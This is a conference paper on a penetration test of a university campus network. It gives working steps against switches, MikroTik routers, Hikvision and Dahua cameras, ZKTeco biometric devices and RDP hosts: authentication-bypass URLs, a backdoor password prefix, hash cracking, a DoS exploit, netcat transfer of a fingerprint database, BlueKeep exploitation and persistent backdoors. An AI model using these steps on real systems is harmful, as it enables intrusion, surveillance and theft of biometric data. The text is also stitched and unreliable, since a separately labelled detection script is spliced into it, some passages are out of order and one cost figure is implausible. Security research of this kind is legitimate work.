2nd International Conference on Computational Sciences and Technologies, 17-19 December 2020 (INCCST 20), MUET Jamshoro

Case Study: Intranet Penetration Testing of MUET

Shameel Syed (Shameel_uddin@yahoo.com), Faheem Khuhawar (faheem.khuhawar@faculty.muet.edu.pk), Khizra Arain (khizra.ashraf11@gmail.com), Talha Kaimkhani, Zohaib Syed (zohaib.hussainj111@gmail.com), Hasan Sheikh, Shahroz Khan

Abstract

Every organisation needs its network, with all of its resources, to be secure from internal as well as external threats. This requires the implementation and proper assessment of the overall security measures. In this paper, we highlight how the intra-network of an educational campus can be highly vulnerable due to improper configuration or inadequate security measures. Our investigation through penetration testing allowed us to gain access to more than 50% of the distribution and core switches from Cisco, IP cameras from Dahua and Hikvision, biometric systems from ZKTeco, MikroTik RouterOS, and PCs/servers with vulnerabilities such as BlueKeep. A systematic procedure for performing the attacks is presented in this paper, along with recommendations for implementing proper security measures.

Keywords: Network Security; Penetration Testing; Testing; Exploitation; Attacks

I. INTRODUCTION

If a vulnerability is used by an unauthorized individual to access a company's network, its resources can be compromised. The objective of a penetration test is to address vulnerabilities before they can be exploited. Penetration testing is a comprehensive method of testing the complete, integrated, operational system, which consists of hardware, software and people. There are three main types of penetration testing: black hat, white hat and grey hat penetration testing. Black hat penetration testing scans the remote hosts for possible vulnerabilities with no prior knowledge of the target, analyzes the vulnerabilities and their possible risk, and finally reports them.
White hat penetration testing is carried out with significant knowledge of the target: it simulates an attack by a penetration tester who has detailed knowledge of the network environment. Grey hat penetration testing, also called grey box analysis, is a strategy in which the tester has limited knowledge of the internal details of the network. The grey hat approach is used specifically when the threat being considered is an inside job. We have used the grey hat approach in our research.

Penetration testing has four steps:

1) Reconnaissance / information gathering
2) Scanning
3) Exploitation
4) Post exploitation

Network scanning is a procedure for identifying devices on a network by employing features of the network protocol to signal devices and wait for a response. Most network scanning is used in monitoring and management, but scanning can also be used to identify network elements or users for attacks. An exploit is a piece of software, a sequence of commands or a chunk of data that takes advantage of a bug or vulnerability to cause unintended behaviour on the target machine. Such unintended behaviour includes gaining control of a system, privilege escalation, or Denial of Service (DoS). Most devices connected to the Internet these days are not maintained and monitored properly. Instead, these are devices that are often not understood as computers but are termed "things", giving rise to the term Internet of Things.

ISBN 978-969-23372-1-2

II. LITERATURE REVIEW

A penetration test is defined as a controlled attempt to penetrate a network from outside in order to detect vulnerabilities [1]. In this age of continuously advancing technologies, every organization, whether it is a university, a hospital or a military organization, is network based. This makes work-related tasks more efficient and effective, but also increases the risk of being targeted by a malicious actor, either for an agenda or for personal gain. This is where penetration testing is important. Offensive security techniques are used in order to discover possible flaws in the network. For an IoT company, it can be seen as complementing the defensive security measures before IoT motes are deployed [2]. It is a basic instinct of a security expert to think like a criminal in order to fill the gaps from the criminal's perspective. So, it is a basic necessity for the penetration tester to know as much as or more than what an attacker can know, in order to make the results meaningful [3].

Wireless connections are low cost and convenient for connecting network devices. The simplicity with which they provide connectivity is also a reason for attackers to target wireless networks. Therefore, authentication protocols have been made to keep unauthorized access out of the network. The two most commonly heard of encryption schemes for wireless networks are Wired Equivalent Privacy (WEP) and Wi-Fi Protected Access (WPA). The WEP algorithm was made to secure wireless Internet connections in 1997, but it was vulnerable on many levels [4]. So WPA was developed as a second encryption standard, which solved many of the problems in WEP. The latest version of WPA is WPA2. WPA2 provides stronger encryption than the WPA standard [5]. Both give the choice of two security modes, i.e., TKIP and AES encryption modes. The WPA2-PSK protocol can be used in a wireless distribution system. For home users, WPA2-PSK (AES Pre-Shared Key) is used. Corporate security is based on 802.1X, the EAP authentication framework that uses a RADIUS server with methods such as EAP-TLS, which provides a much stronger authentication system and secure key distribution [6].

The greatest attack that engraved its name recently is WannaCry.
WannaCry is a type of ransomware; ransomware is a type of malware that takes full control of the targeted system and demands a ransom for the safe return of the system's functionality. WannaCry makes use of EternalBlue and DoublePulsar. It started on May 12, 2017. EternalBlue is a well-known vulnerability in the Server Message Block (SMB) protocol employed by Microsoft Windows on ports 445 and 139. Once the malware is injected into the machine, it searches for the backdoor. The WannaCry malware spread to over 300,000 systems in over 150 countries [7]. WannaCry had only one agenda: to collect ransom. It froze or completely locked down the target systems by encrypting them and demanded about $300-$600 to release the lock.

CCTV cameras, which are the very eyes of an organization and keep security in check, can also be exploited. A cyber-attack on a Russian bank gave hackers access to 24,000 CCTV cameras in 30 different countries. This attack led the bank to lose more than 31 million USD [8].

Recently, a new vulnerability was released in Microsoft's RDP service which is considered to be as dangerous as EternalBlue. This paper also illustrates the exploitation of, and safety measures against, this vulnerability.

According to an estimate provided by the US Computer Emergency Response Team (CERT), almost 40 percent of IT security breaches are perpetrated by people inside the company. Additionally, the FBI/CSI risk assessment implied that many enterprises' ports are left open, and any laptop can plug into the network and gain access as a common practice. The total loss of the companies surveyed was approximately over 130 million USD, with the average expenditure per employee being about 241 million USD per year. 28 percent of the employees stated they had no idea whether they had been attacked, or how many times. Yet about 32 percent of employees said they were never attacked from the inside.
This paper deals with the penetration test procedure for determining the security level, so as to highlight the possible vulnerabilities that could be exploited in the Campus Area Network (CAN) of Mehran University of Engineering and Technology (MUET), including the IP cameras, biometric systems, and switches deployed within the network. This paper explains the various data link protocols that were compromised during the research. Although a lot of work has been done in the area of penetration testing, we have specifically followed standard penetration testing on the live network of Mehran University of Engineering and Technology using the grey hat approach.

III. METHODOLOGY

Network penetration testing has the following four steps.

A. Reconnaissance

Reconnaissance is the process of collecting information about the target without being discovered, and using that information to perform a detailed penetration test. Reconnaissance is the biggest phase any penetration tester goes through, to identify devices on the network and their interconnection. The generic topology of the campus area network is shown in Figure 1; it was obtained through a survey and later verified.

Fig. 1: Network Diagram of Campus Area Network

To gain basic information about DHCP, DNS and the subnet IP address, the following commands were used.
    username@hostname:~$ ifconfig

It was found that the subnet IP changed from department to department, i.e., every department at MUET has a different subnet ID, and DHCP was part of it, whereas the local DNS information remained the same. ICMP (ping) messages were sent from one department to another, and from this it was realized that tagged frames were being sent along with a VLAN ID. Using this approach, information about the VLANs of the different departments was collected. Later, this information was verified after discovering misconfigured switches that allowed an unauthenticated bypass: if the first two or three sessions via the Telnet protocol are kept open beforehand, the fourth session allows an attacker to enter the switch without being prompted for any password.

    username@hostname:~$ telnet 172.16.X.X

This allowed the Cisco IOS shell to be enabled, and eventually the configuration file could be read, through which the complete topology of MUET's network could be discovered, i.e., how the core, aggregation, distribution, and access switches are interconnected with one another. Furthermore, additional information, such as the ACL rules and the configuration of L2 protocols such as CDP, VTP, STP, and DTP, was also collected.

B. Scanning

The scanning process identifies security weaknesses in a remote target network or in local hosts. To achieve this, the IP address information of live hosts and layer-2 devices was collected. Then the targeted hosts were scanned for open ports using the tool nmap.

    username@hostname:~$ nmap -T4 -A -v

By this approach, tables of hosts with their IP addresses, corresponding MAC addresses and open ports were made. Because of the VLAN restrictions, the scan initially had to be done on each VLAN separately. Later on, after the exploitation of the core switch, the detailed information was retrieved quickly and without any exhaustion.

C. Exploitation

1) Switches: The switches with open Telnet ports were targeted after a careful review of the scanning results.
Upon attempting to access the switches, it was discovered that more than 50% of the switches used default credentials, irrespective of their vendor. Switches that had their default passwords changed were misconfigured, for example using vty 0 4, allowing access to the switch after 5 simultaneous virtual connection sessions. Figure 2 shows a snapshot of accessing the core switch.

Fig. 2: Accessing Core Switch

It was discovered that the Cisco IOS shell was enabled, through which the configuration files of all of the core switches could be copied. From these configuration files, extensive information that helped in exploiting various L2 protocols was gathered. The password hashes of users with privilege level 15 and the password to enter the global configuration mode of the switch can also be retrieved from the configuration file; these were later cracked with the help of hashcat¹. This paper demonstrates the use of hashcat from Windows. Assuming that hashcat is installed on the C drive, the following command was used to brute-force the password, assuming that the password consisted of 6 characters, where crack.txt is the file that stores the Cisco Type 5 hashes. The output of hashcat is shown in Figure 3.

    C:\hashcat>hashcat64.exe -a 3 -m 500 crack.txt ?a?a?a?a?a?a

Switches running Cisco IOS are by default allowed to write data into flash storage; this could be further exploited to write malicious code and trigger it to spread malware throughout the network. Figure 4 demonstrates writing and adding a text file to the core switch. All of the files in the flash storage of the switch can be listed, and the configuration file can be read using the cat command.

Fig. 3: Hashcat

Fig. 4: Writing data into the flash storage of core switch

Linksys switches were exploited through a vulnerability called The Moon. This vulnerability can be exploited through Metasploit or RouterSploit. Figure 5 demonstrates how it is done.
¹ The tool hashcat needs to be installed first on the PC (Linux or Windows).
Fig. 5: Exploitation of Linksys switches

Remote network connections are a basic necessity for the management of enterprise networking devices: routers and switches are accessed on a daily basis for tasks such as creating and removing VLANs, or adding and removing interfaces. Access to the router/switch is done via either Telnet or Secure Shell (SSH). Using Telnet is rather common even though it is insecure. It is highly recommended that SSH be used instead of Telnet.

2) Routers: It was discovered that the router currently deployed on the campus was running MikroTik RouterOS 6.42.9. An easy approach was taken, in which the preinstalled tool searchsploit was used to find the known vulnerabilities of the vendor MikroTik. Figure 6 shows the exploits listed for MikroTik RouterOS v6.42.9. To exploit, the following command was used.

    cat /usr/share/exploitdb/exploits/hardware/remote/46444.txt

Furthermore, the DoS attack listed among the exploits found by searchsploit can be performed on MikroTik RouterOS using the following command.

    python /usr/share/exploitdb/exploits/hardware/dos/18817.py 172.16.X.X config 9

Fig. 6: Searching Exploits by Searchsploit

3) IP Cameras: Organizations pay no attention to security vulnerabilities before purchasing and deploying CCTV cameras. Our investigation led us to exploit IP cameras from different vendors; most of the vulnerabilities of these devices are well documented, yet they were still not patched. We demonstrate how easy it was to gain access to the CCTV system using a brute-force attack via the tool Hydra. Figure 7 demonstrates how Hydra is used.

Fig. 7: Dictionary Attack on IP Cameras

From those IP cameras, the database was extracted, but the passwords were encrypted using the proprietary algorithm of the company. The password hashes were extracted from the database, and those hashes were used to access cameras from Hikvision.
This allowed direct access to the camera, suggesting a poor implementation by Hikvision and a vulnerability in these cameras. Another downside of using IP cameras on an intranet is that the passwords have to be hashed offline, which means that the algorithm must be somewhere in the system. After exploring the camera, the algorithm was found in sofia.py. Figure 8 demonstrates how this algorithm converts 888888 to its hash.

Fig. 8: Hashing Algorithm

Afterwards, a script was written to perform a brute-force attack to find the passwords of the registered users, and thus access was gained to different cameras which were not accessible via Telnet. It was found that Hikvision and Dahua use the same algorithm to convert plain text into the hash. The database of some of the cameras was compromised due to the existence of a backdoor in the camera, using these links on different cameras:

    http://<ip>:<port>/mnt/mtd/config/account1
    http://<ip>:<port>/mnt/mtd/config/password
    http://<ip>:<port>/currentconfig/passowrd

After Dahua noticed that hackers had been accessing cameras using the default usernames and passwords, they released a patch that disabled Telnet access. However, disabling remote access turned out to be a much bigger obstacle for users of the IP cameras than expected, because if usernames and passwords were forgotten there was no way to access the cameras. To cope with that situation, Dahua provided a script to access the cameras through Telnet:

    http://<ip>:<port>/cgi-bin/configmanager.cgi?action=setconfig&telnet.enable=true

After entering the script, a username and password are asked for. But before the password, the string 7ujMko0 has to be added. For example, if the username and password are admin, the password has to be provided as 7ujMko0admin. The passwords recovered by the previous methods were used together with this string, and it also let default credentials open the Telnet door of various cameras.
In some Hikvision cameras, entering the following URL into the browser allows an attacker to bypass authentication.

    http://<ip>:<port>/security/users?auth=ywrtaw46mtek
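From the defender's side, the Dahua Telnet-enable call above and the Hikvision auth-parameter URLs used in this section are easy to spot in a web proxy, IDS or camera access log. The following Python script is an added example for this paper (not the authors' tooling): it scans Common Log Format lines for exactly those request paths, decodes the base64 "auth" query value when it decodes to printable text (YWRtaW46MTEK, the value used in the configuration-file URL, decodes to admin:11; the lower-cased copy shown in the URL above is not valid for base64, which is case-sensitive, so the decoder reports it as undecodable), and flags the configmanager.cgi call that re-enables Telnet. The log format, the 192.0.2.x client addresses and every sample line are constructed; the paths are the ones on the page.

```python
"""Flag IP-camera management / auth-bypass requests in web access logs.

Added example for this paper (not the authors' code). The log format
(Common Log Format), the 192.0.2.x client addresses and every sample line
are constructed; the URL paths are the ones discussed in the paper.
"""
import base64
import re
from urllib.parse import parse_qs, urlsplit

# Request paths named in the paper for Hikvision and Dahua cameras.
SENSITIVE_PATHS = {
    "/security/users": "Hikvision user listing via 'auth' parameter",
    "/system/configurationfile": "Hikvision configuration file download",
    "/onvif-http/snapshot": "Hikvision snapshot via 'auth' parameter",
    "/cgi-bin/configmanager.cgi": "Dahua configuration change",
}

# Common Log Format: client ident user [timestamp] "METHOD URL PROTO" status size
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+)[^"]*" (?P<status>\d{3})'
)


def decode_auth(value):
    """Decode a base64 'auth' value to 'user:password' text.

    Returns None when the value is not valid base64 or does not decode to
    printable ASCII (e.g. a lower-cased copy of the token).
    """
    try:
        text = base64.b64decode(value, validate=True).decode("ascii")
    except ValueError:  # binascii.Error and UnicodeDecodeError both derive from it
        return None
    text = text.strip()
    return text if text and text.isprintable() else None


def analyse_request(src, url, status):
    """Return a finding for one request, or None if the path is not sensitive."""
    parts = urlsplit(url)
    reason = SENSITIVE_PATHS.get(parts.path)
    if reason is None:
        return None
    query = parse_qs(parts.query)
    finding = {
        "src": src, "path": parts.path, "reason": reason, "status": status,
        "auth": None, "telnet_enable": False,
    }
    if "auth" in query:
        finding["auth"] = decode_auth(query["auth"][0])
    # Dahua: action=setconfig&telnet.enable=true turns the Telnet service back on.
    if query.get("action") == ["setconfig"] and query.get("telnet.enable") == ["true"]:
        finding["telnet_enable"] = True
    return finding


def scan_log(lines):
    """Run analyse_request over log lines; a 2xx status means the camera served it."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:
            continue
        finding = analyse_request(m["src"], m["url"], int(m["status"]))
        if finding is not None:
            findings.append(finding)
    return findings


# Constructed sample log; 192.0.2.0/24 is a documentation range, not a real client.
SAMPLE_LOG = """\
192.0.2.23 - - [12/Dec/2020:10:14:02 +0500] "GET /security/users?auth=YWRtaW46MTEK HTTP/1.1" 200 1432
192.0.2.23 - - [12/Dec/2020:10:14:05 +0500] "GET /system/configurationfile?auth=YWRtaW46MTEK HTTP/1.1" 200 20480
192.0.2.23 - - [12/Dec/2020:10:14:09 +0500] "GET /onvif-http/snapshot?auth=ywrtaw46mtek HTTP/1.1" 401 0
192.0.2.41 - - [12/Dec/2020:10:15:30 +0500] "GET /cgi-bin/configmanager.cgi?action=setconfig&telnet.enable=true HTTP/1.1" 200 12
192.0.2.77 - - [12/Dec/2020:10:16:00 +0500] "GET /index.html HTTP/1.1" 200 512
""".splitlines()

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        cred = f["auth"] or "-"
        print(f'{f["src"]} {f["path"]} status={f["status"]} auth={cred} '
              f'telnet_enable={f["telnet_enable"]}  # {f["reason"]}')
```

Because these requests go straight to the camera, the log has to come from a proxy, an IDS on a mirror port, or the camera itself. A 2xx status on one of these paths is a confirmed exposure; a 401, as on the third sample line, shows the request was attempted but refused.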
Worse, by using this method, the configuration file of Hikvision cameras can also be downloaded.

    http://<ip>:<port>/system/configurationfile?auth=YWRtaW46MTEK

This configuration file contains the usernames and passwords (in plain text) of all configured users. The files are encrypted, but the encryption is easily reversible because of the presence of a static encryption key derived from the password abcdefg.

    http://<ip>:<port>/onvif-http/snapshot?auth=ywrtaw46mtek

The above URL allows the attacker to take a snapshot from the IP camera, as can be seen in Figure 9.

Fig. 9: Snapshot Taken by Entering Script

This vulnerability also allows an attacker to change the password of Hikvision IP cameras very easily, as demonstrated in Figure 10.

Fig. 10: Software based on this vulnerability

There is a protocol, ONVIF, which was enabled on the majority of the cameras and was left unprotected due to a lack of knowledge of this protocol. Through this protocol, using the following URL in software like VLC Media Player gives access to the IP cameras with default credentials.

    rtsp://<ip>:<port>/cam/realmonitor?channel=1&subtype=0&unicast=true&proto=onvif

ONVIF Device Manager can be used to manage the cameras on which this protocol is enabled. This allows adding/deleting users, changing the movement of the camera, speaking into the camera, changing the DNS server, changing the NTP server, and other features as well. A snapshot of using ONVIF to access the IP cameras is shown in Figure 11.

Fig. 11: Accessing cameras using ONVIF

4) Biometric Systems: Biometric fingerprint systems are used throughout the campus for the attendance of faculty members, and in some organizations biometric systems are used as door locks. Penetration testing was done on two ZKTeco models, uface800/id and iclock880-h/id. The embedded Linux platforms in these systems are ZM220, ZEM600 and ZEM800.
Telnet was enabled on these machines and the default passwords had not been changed, due to which access was gained to the systems after brute-forcing with probable wordlists. Figure 12 demonstrates accessing the biometric system via Telnet.

Fig. 12: Accessing biometric via Telnet

First, the database files were searched for using the following command.

    find -name "*.db"
This searches all the files in the system having the extension .db, which denotes a database file. After navigating to that directory, the database file was transferred using the tool netcat. The command on the sending side (ZEM220) was:

    nc 172.16.23.32 9999 < ZKDB.db

172.16.23.32 is the IP of the PC on which the file was to be received, but port 9999 had to be opened on that PC to receive the transferred file, using the following command on the PC:

    nc -l -p 9999 > ZKDB

where -l denotes that port 9999 is opened to listen for the remote connection. sqlite or any other software can be used to view the transferred file. After making changes, the .db file was uploaded to the system the same way it was downloaded, using netcat.

UDP port 4370 of the ZK5000-ZK9000 allows anyone to connect to the system without any proper authentication. Custom commands can be created and sent to the device through UDP port 4370 to download information. This can be confirmed using the tool Scapy on Linux. Alternatively, the proprietary software of this company is also available, which uses this port to connect to the device without a password. Although other versions of this software can be used to exploit this vulnerability, this has been confirmed by employing the software ZKTeco 5.0 as shown in Figure 13.

Fig. 13: Snapshot of ZKTeco 5.0

This shows that one device has been connected without providing any password. The following actions can be performed with this software:

1) Add a user
2) Delete a user
3) Change the privileges of users
4) Modify the attendance log sheet, i.e., change the time and nature of attendance

This database can be decrypted to extract the fingerprints of the users registered in the device; these extracted fingerprints can then be used against the user in various ways, i.e., impersonation, identity theft, etc.
5) Exploiting Vulnerabilities in an Operating System: In the networks of different organizations there is a plethora of vulnerabilities to exploit, varying with the users. Different vulnerabilities were discovered in the scanning phase, which were exploited to gain access to various systems. One of the most common vulnerabilities used to access a system is EternalBlue, which can be exploited easily through the Metasploit framework. This paper focuses on the following two vulnerabilities.

Firstly, this paper demonstrates the exploitation of an old bug that has been present in Netatalk for a long time. Pea is a proof of concept which bypasses authentication to gain control of the execution flow of Netatalk, as shown in Figure 14. This vulnerability has been patched in 3.1.10. Further details can be found on the website of NIST by searching for CVE-2018-1160.

Fig. 14: Exploitation of Netatalk 3.1.10

Secondly, this paper explains the exploitation of a vulnerability which is a hot topic these days. BlueKeep (CVE-2019-0708) is a recently discovered vulnerability in the RDP service of Microsoft. This is a wormable vulnerability which can be considered as dangerous as EternalBlue. Once exploited, this vulnerability provides an attacker with complete access to the host. From the scanning phase, information was gathered on which hosts are running the Microsoft RDP service. The following text demonstrates scanning them further with a Metasploit module, to evaluate how many of the hosts are vulnerable to BlueKeep.

    msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > set RHOSTS 172.16.100.3 172.16.100.5 172.16.100.6 172.16.100.7 172.16.100.8 172.16.100.9 172.16.100.10 172.16.100.11 ...
    RHOSTS => 172.16.100.3 172.16.100.5 172.16.100.6 172.16.100.7 172.16.100.8 172.16.100.9 172.16.100.10 172.16.100.11 ...
    msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > run
    [*] 172.16.100.3:3389 - The target is not exploitable.
    [*] 172.16.100.4:3389 - The target is not exploitable.
    [*] Scanned 2 of 18 hosts (11% complete)
    [+] 172.16.100.5:3389 - The target is vulnerable.
    [*] 172.16.100.7:3389 - The target is not exploitable.
    [*] Scanned 4 of 18 hosts (22% complete)
    [+] 172.16.100.11:3389 - The target is vulnerable.
    ...

Since Metasploit had only recently published the module for exploiting BlueKeep, the module had to be added manually.

    wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
    mv cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/

After that, open Metasploit and run the following command,

    reload_all

set RHOST to the target and launch the attack. After the attack was done, a meterpreter shell was obtained, through which complete access to the victim's PC was gained, as can be seen in Figure 15.

Fig. 15: Exploiting Bluekeep

Other than exploiting devices as a whole, this work also focuses on exploiting the data-link layer protocols of the TCP/IP suite. The main purpose in building the TCP/IP suite was to ensure that the different layers work without knowledge of each other. Unfortunately, this means that if any one layer of the TCP/IP suite is attacked, the other layers will have no idea of the problem. In networking, layer 2 is a very weak link and prone to attacks. The following layer-2 protocols were compromised: ARP, VTP, STP, and DTP.

6) ARP Spoofing: ARP is used to discover the MAC address associated with a given IP address. A client can send an unsolicited reply, called a gratuitous ARP, and the other hosts in the same subnet may save that information in their ARP tables. This way, anyone can claim to have any IP/MAC address. This is how ARP attacks redirect traffic. There are certain countermeasures to ARP spoofing attacks, such as using the DHCP snooping binding table, in which all ARP packets must match the binding table entries or else be discarded. This is done when Dynamic ARP Inspection is enabled. In the network under consideration, DHCP snooping is enabled, but there is a proxy server deployed in the network which authenticates every request that is sent. Since the proxy server uses plain HTTP, by poisoning the whole VLAN the usernames and passwords of clients can be retrieved. The tool MITMf v0.9.8 is used to demonstrate the procedure, as shown in Figure 16. The example demonstrates ARP poisoning by setting the gateway address and the target range.

Fig. 16: ARP Spoofing using MITMF

7) DTP Attack: On a switch, a port is configured in one of two ways: either as an access port or as a dynamic port.
When a host is connected to a switch, an access port is used. With VLAN implementation, each access port is assigned to only one VLAN. On the contrary, a trunk port allows the traffic of multiple VLANs to pass through. A trunk port can be configured via a Cisco propriety protocol called Dynamic Trunking Protocol (DTP). DTP automates the IEEE 802.1x/ISL Trunk configuration. It does not operate on routers. Synchronization of trunking mode on end links is done by the DTP. DTP state on trunking port can be set to Auto, On, Off, Desirable, or Non-Negotiate. In switch spoofing attack, the attacker impersonates as a switch in order to trick a legitimate switch into creating a trunking link between them. As already mentioned, any VLAN s packets are allowed to pass through the trunking link. Upon establishment of the link, traffic from any VLAN can be accessed by an attacker. The chance of success of this exploit depends solely on the fact that the legitimate switch is configured as Dynamic Desirable, Dynamic Auto or Trunk mode. Since the switches under consideration were configured as Auto, so a switch spoofing attack was performed using the tool Yersinia v0.8.2 as shown in Figure 17, and thus a trunk link was formed. Fig. 17: DTP attack using Yersinia It can be clearly seen that, access port was assigned and then it turned into trunk link after a successful DTP attack. This attack also provides a way for VLAN hopping attack / double Encapsulation attack. This attack can be prevented by manually assigning each port as an access or trunk port. Further security 120
measures include using a different VLAN other than default VLAN as a Native VLAN. 8) VTP Attack: Switches are added to a VTP domain for them to use VTP. This VTP domain is defined in a VTP server, and later clients and transparent devices as well. Whenever a new VLAN is added/created in a VTP server, the VTP server will automatically distribute this information among all the switches present in the VTP domain. All the switches (except the VTP server) are defined as client switches, and their task is to listen to the changes regarding VLANs by the VTP server. Switches that are configured transparent, without altering their VLAN assignments, will simply forward the VTP information. This is really useful when there are a lot of switches involved in the network. Since all VLAN information can simply be altered from any place and automatically be changed due to VTP server. On the other hand, some risks are involved that an attacker could exploit that usefulness by creating a rogue VTP server and gain complete control over the VTP domain VLANs. To remedy that, VTP implements MD5-based authentication in the VTP frames. In MD5 authentication, VTP server has a password for authenticating the VTP domain switches, without that password switches will not authenticate VTP information. Password is sent in MD5 hash. This hash is then verified and used by the client switch. There are mainly two facts to consider when injecting VTP frames. The port should be turned into a trunk by the attacker (via DTP attack), and the VTP configuration revision number should be higher than the previous advertisements of VTP for recent update reflection. By adding or deleting the VLANs via a rogue VTP server, a VTP attack is done. when there is a need to make changes. Other switches are secondary by default which secures the network from this attack. 9) CDP Attack: The Cisco Discovery Protocol (CDP) is another propriety protocol of Cisco used by all devices by default. 
Directly connected devices are discovered using CDP, to simplify their configuration and connectivity. There is no maintained encryption in CDP messages. Information of CDP is broadcasted periodically, updating each device s CDP database. Routers cannot propagate it because CDP is a layer 2 protocol. Information of network devices such as software version, IP address, capabilities, platform, interfaces and the native VLAN information are gathered up in CDP. Ultimately, whole network s topology could be determined using CDP and if it gets into an attacker s hand, this information could be used to exploit the network in many ways, mainly in the form of a Denial of Service (DoS) attack. Attacker can get CDP information via Wireshark or other network analyzer tool to sniff out the broadcast messages sent by the CDP. For example, if attacker gets to know the Cisco IOS version of the device as shown in Figure 19. This information is enough to search for exploits in that particular version. The attacker can also send malicious or bogus CDP packets to the directly connected Cisco devices, which can cause the switch to utilize its CPU to a maximum of 100%. CDP is a useful protocol when documentation of a network is being made and in most cases CDP is enabled on every switch and port in the network. Fig. 19: CDP Fig. 18: VTP Information A rogue VTP server can be made on any switch by increasing the revision number from the previous one (previous revision number was known by viewing VTP information in core switch as shown in Figure 18), after sending the command to change VLAN configurations via rogue VTP server, the MD5 hash was sent with that frame and there were no qualms in accepting that malicious frame since the hash was authenticated. This was done using the tool Yersinia. It is important to know that exploitation of MD5 hash was possible because switches were configured with VTP Version 2. The remedy of that is to implement VTP Version 3. 
VTPv3 uses status made up of primary and secondary VTP servers. Primary status is used only 10) STP Attack: Spanning Tree Protocol (STP) is used to avert the loops being formed on layer-2 switches or bridges network with multiple paths for redundancy reason. Switches are made aware of each other and the bandwidths of links being used between them. The switches can then select a path that is both loop-free and with maximum possible bandwidth in the network. The decision of choosing the link is based on STP path cost. There is a reference point to control the STP called Root Bridge. The root of STP is selected from the switches via Election Process. All the traffic goes through root bridge. Subsequent to the election of root bridge, a root port is elected that has the shortest STP path cost to the root bridge. After that, designated ports for each segment of network are selected. All the STP attacks differ based on the modification of one or more fields of BPDU frames. After sniffing existing legitimate BPDUs and taking their settings into account, the most dangerous attack type would be presenting a machine under 121
your control as the Root Bridge, so that all the traffic in the STP topology goes through the attacker. STP BPDUs should not propagate through access ports, but such BPDUs were accepted due to misconfiguration. Knowing the bridge priority from the reconnaissance phase (via the core switch), the bridge priority of a switch chosen from the network was changed to be lower than that of the root switch, thus making that switch the root bridge, which enabled the whole data flow to be sniffed. The above-mentioned attack (called the root role attack) can be thwarted by Root Guard and BPDU Guard, which were not enabled here. Secondly, an STP DoS attack was also performed by sending thousands of packets per second with the help of Yersinia. The switch processed so many configuration BPDUs, which kept constantly changing the root bridge within the STP topology, that STP was left confused. Thirdly, another DoS attack was performed in which TCN BPDUs were sent to the root bridge, which caused the STP topology to change continuously. BPDU filtering can be used to mitigate both of the above-mentioned DoS attacks.

11) DHCP Starvation: The DHCP protocol is an integral component whose function is the configuration of client machines with IP addresses and other information such as subnet mask, DNS address and default gateway. DHCP starvation is an attack that targets DHCP servers, in which malicious DHCP requests are made to exhaust the pool of all available IP addresses. As a result, legitimate network users suffer a DoS. DHCP starvation can be launched even with minimal bandwidth [9]. In our attack, as can be seen in Figure 20, a DHCP Release message is sent as a broadcast in the VLAN to release the IP addresses of the users, followed immediately by DHCP Request messages to completely exhaust the IP pool of the DHCP server.

Fig. 20: DHCP Attack

Afterwards, a rogue DHCP server can be created to assign IP addresses through our system and then perform a Man-In-The-Middle attack on the victims who have obtained IP addresses through the rogue DHCP server.

D. Post Exploitation

The purpose of this phase is to create an alternate way to get into the system so that access to compromised systems remains intact. For that, backdoors were created and then deployed on compromised IP cameras and biometric systems. In biometric systems, a persistent backdoor was created via the netcat tool. However, different vendors of IP cameras (or even some biometric systems) do not support the netcat tool, so in order to create persistent backdoors in such systems, tools like ShellPop or TheFatRat can be used.

IV. CONCLUSION

Securing the network of an organization requires penetration testing. This helps to identify vulnerabilities which can be exploited with malicious intent. Network administrators should be aware of the security aspects of different protocol configurations on networking devices. This awareness helps employees to avoid internal, external, and social engineering attacks on the network. Moreover, a well thought out security policy which is in line with the organization's needs is a very important factor when deploying a network. The following steps must be taken to mitigate the threats outlined in this research paper.
(1) Change the default credentials of all the protocols configured in a network. Devices which allow unauthenticated access should not be allowed remote access; alternatively, restricted access should be allowed to authorized users by deploying specific security policies.
(2) Configure port security to prevent DHCP starvation attacks.
(3) Enabling the DHCP snooping feature will prevent rogue DHCP server attacks.
(4) ARP attacks can be prevented by Dynamic ARP Inspection (DAI).
(5) IP/MAC spoofing can be prevented using the IP Source Guard (IPSG) feature.
(6) SSH should be used instead of Telnet to configure network devices remotely, as Telnet establishes a session in which information flows in plain text and can easily be sniffed via Wireshark or any other sniffing tool.
(7) Passwords must be set for all VTY sessions and not just for the first three or four; otherwise an attacker can exploit this to attack the network.
(8) Port security should be enabled on all the active interfaces (access ports) of a switch, and all unused ports should be shut down to avoid unauthorized access.
(9) IDS or ARP inspection prevents ARP attacks.
(10) For prevention of attacks related to STP, the BPDU Guard and Root Guard features should be enabled.
(11) Use VTP version 3 to fend off VTP attacks.
(12) Use CDP only when it is necessary.

REFERENCES
[1] S. Türpe and Jörn Eichler. Testing production systems safely: Common precautions in penetration testing. pages 205-209, Oct. 2009.
[2] Chung-Kuan Chen, Zhi-Kai Zhang, Shan-Hsin Lee, and Shiuhpyng Shieh. Penetration testing in the IoT age. Computer, 51:82-85, Apr. 2018.
[3] Bishop Matt. About penetration testing. IEEE Security and Privacy, 5(6):84-87, 2007.
[4] Erik Tews and Martin Beck. Practical attacks against WEP and WPA. In Proceedings of the second ACM conference on Wireless network security,
pages 79-86. ACM, 2009. https://dl.acm.org/citation.cfm?id=1514286, last accessed on 2019-09-30.
[5] Joseph Mwangi, Dr. Wilson Cheruiyo, and Dr. Michael Kimwel. Security analysis of WPA2. Control Theory and Informatics, 5, 2015. https://pdfs.semanticscholar.org/bbd9/af99e0ff0a1df675d4dbac81b8d815999869.pdf, last accessed on 2019-09-30.
[6] Arash Habibi Lashkari, Mir Mohammad Seyed Danesh, and Behrang Samadi. A survey on wireless security protocols (WEP, WPA and WPA2/802.11i). In 2009 2nd IEEE International Conference on Computer Science and Information, pages 48-52. IEEE, 2009. https://ieeexplore.ieee.org/abstract/document/5234856, last accessed on 2019-10-12.
